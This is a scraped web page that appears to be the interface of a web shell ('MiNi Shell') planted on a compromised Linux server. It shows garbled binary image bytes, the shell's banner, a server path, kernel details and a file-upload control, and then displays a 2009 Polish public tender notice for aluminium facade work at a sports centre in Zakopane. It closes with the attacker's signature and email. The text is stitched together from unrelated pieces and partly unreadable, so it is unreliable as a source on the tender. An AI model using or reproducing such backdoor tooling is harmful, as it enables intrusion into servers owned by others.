JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090820/287444-N-2009.html

<p class="kh_header"><b>Zakopane: WYMIANA ŚLUSARKI I STOLARKI ALUMINIOWEJ W BUDYNKU BASENOWYM W COS OPO ZAKOPANE WRAZ Z ROBOTAMI TOWARZYSZĄCYMI</b><br>
<b>Numer ogłoszenia: 287444 - 2009; data zamieszczenia: 20.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Ośrodek Sportu w Warszawie Ośrodek Przygotowań Olimpijskich w Zakopanem , ul. Bronisława Czecha 1, 34-500 Zakopane, woj. małopolskie, tel. 018 2012274, faks 018 2014906.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYMIANA ŚLUSARKI I STOLARKI ALUMINIOWEJ W BUDYNKU BASENOWYM W COS OPO ZAKOPANE WRAZ Z ROBOTAMI TOWARZYSZĄCYMI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymiana istniejącej stolarki i ślusarki aluminiowej ścian fasadowych przeszklonych na kondygnacjach parteru oraz przyziemia. Wymiana będzie polegała na demontażu istniejącej jednoszybowej, podwójnej ślusarki i stolarki i montażu fasad w systemie ryglowo słupowym z szybami zespolonymi. Podział okien, wymiary okien, świetlików oraz drzwi w nowej ślusarce i stolarce zostaną zachowane. Prace obejmą również wymianę grzejników i orurowania w kanałach międzyokiennych i pod linią parapetu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.00-5, 45.11.13.00-1, 45.45.00.00-6, 45.26.21.00-2, 45.44.21.00-8, 45.31.70.00-2, 45.33.11.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1 ZAMAWIAJĄCY informuje że, dla udziału w postępowaniu jest wymagane wniesienie wadium w kwocie 8000,00 PLN (słownie: osiem tysięcy złotych).
2 Wadium wnosi się przed upływem terminu składania ofert.
3 Wadium może być wnoszone w jednej lub kilku następujących formach:
a.	pieniądzu;
b.	poręczeniach  bankowych  lub   poręczeniach   spółdzielczej   kasy  oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy   z   dnia   9   listopada   2000   r.   o   utworzeniu   Polskiej   Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)
4 Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy ZAMAWIAJĄCEGO:
                 Bank PKO S.A. 33 1240 4748 1111 0000 4881 0588
5 ZAMAWIAJĄCY uzna termin wniesienia wadium przelewem bankowym za dotrzymany, jeśli kwota wadium będzie zaksięgowana na koncie ZAMAWIAJĄCEGO w terminie składania ofert.
6 Dowód wniesienia wadium WYKONAWCA składa wraz z ofertą. W przypadku: poręczeń bankowych, gwarancji bankowych lub poręczeń spółdzielczej  kasy oszczędnościowo- kredytowej,   gwarancji   ubezpieczeniowych,   poręczeń   udzielanych   przez   podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości   dowód   wniesienia   wadium   musi   zostać   dołączony do   oferty
w oryginale, dla wadium wniesionego w pieniądzu dowód jego wniesienia stanowi kopia przelewu, potwierdzona za zgodność z oryginałem.
7 Niezależnie   od   formy   wniesienia   wadium   musi   ono   spełniać   warunki   wadium wniesionego w pieniądzu i WYKONAWCA nie może ograniczać w żaden sposób  (np. dodatkowymi  dokumentami, wymaganiami) prawa ZAMAWIAJĄCEGO do dysponowania wadium, jeżeli zajdą okoliczności wymienione w ustawie Prawo zamówień publicznych.
8 ZAMAWIAJĄCY zatrzymuje wadium wraz z odsetkami, jeżeli WYKONAWCA w odpowiedzi na wezwanie  nie  uzupełnił   dokumentów  i   oświadczeń  lub   pełnomocnictw  chyba,   że udowodni, że wynika to z przyczyn nie leżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wyłącznie ci WYKONAWCY, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na mocy art. 24 ust. 1 i 2 oraz spełniają warunki (ogólne) określone w art. 22 ust. 1 pkt 1÷3 PZP, a mianowicie:
1)	posiadają uprawnienia do wykonywania określonej w SIWZ działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2)	posiadają niezbędną wiedzę i doświadczenie tj.: wykażą, że w ciągu ostatnich pięciu lat przed wszczęciem postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej jedno wykonanie fasady szklanej, słupowo ryglowej o powierzchni co najmniej 300 m2, o wartości co najmniej 400 000,00 PLN   
Dla potwierdzenia spełnienie tego warunku wymagane są dokumenty świadczące o należytym wykonaniu zadania. 
3)	dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. Przez osoby zdolne do wykonania zamówienia Zamawiający rozumie posiadanie (dysponowanie):
	1 osobą, która posiada uprawnienia bez ograniczeń do kierowania robotami budowlanymi w specjalności  konstrukcyjno - budowlanej; 
4)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
a) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 800 000 zł..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	<OFERTA> sporządzona zgodnie z treścią Załącznika nr 1, określająca na podstawie FORMULARZA CENOWEGO cenę (wartość brutto), obliczoną w sposób opisany w pkt 4 SIWZ. 
2.	<OŚWIADCZENIE> o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia, wymaganych na mocy art. 22 ust. 1 PZP, sporządzone zgodnie z treścią załącznika nr 2. Na potwierdzenie spełniania warunków udziału w niniejszym postępowaniu żąda się także złożenia w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez WYKONAWCĘ, następujących dokumentów: 
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)	wykaz wykonanych, robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym opisanym w punkcie 2.2) SIWZ, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców tj. zrealizowali co najmniej jedno wykonanie fasady szklanej, słupowo ryglowej o powierzchni co najmniej 300 m2 i wartości co najmniej 400 000,00 PLN oraz załączenia dokumentów potwierdzających, że roboty te zostały wykonane należycie. Wzór wykazu podany jest w załączniku nr 4 do SIWZ. W przypadku podania wartości wykonanych robót w walutach obcych, Zamawiający dokona ich przeliczenia na złotówki według średniego kursu walut ogłoszonego przez NBP na dzień wyznaczony na składanie ofert.
c)	wykaz osób przewidzianych do realizacji  zamówienia, o których mowa w pkt 2.3) SIWZ wraz z informacjami na temat ich kwalifikacji wg załącznika nr 5 do SIWZ,
d)	uprawnienia budowlane bez ograniczeń odpowiednio dla każdej z osób wymienionych w wykazie - załączniku nr 5 wraz z zaświadczeniem o przynależności do właściwej izby zawodowej zgodnie z ROZPORZĄDZENIEM MINISTRA TRANSPORTU I BUDOWNICTWA z dnia 28 kwietnia 2006 r.
           w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z dnia 16 maja 2006 r.)
e)	polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca/ Wykonawcy jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości określonej w pkt 2. ppkt 4 lit. a,  aktualną na dzień składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.cos.pl (zakładka Przetargi/Zakopane).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centralny Ośrodek Soprtu OPO w Zakopanem, ul. Br. Czecha 1, 34-500 Zakopane.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2009 godzina 10:00, miejsce: Centralny Ośrodek Soprtu OPO w Zakopanem, ul. Br. Czecha 1, 34-500 Zakopane, sekretariat w budynku administracyjnym.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com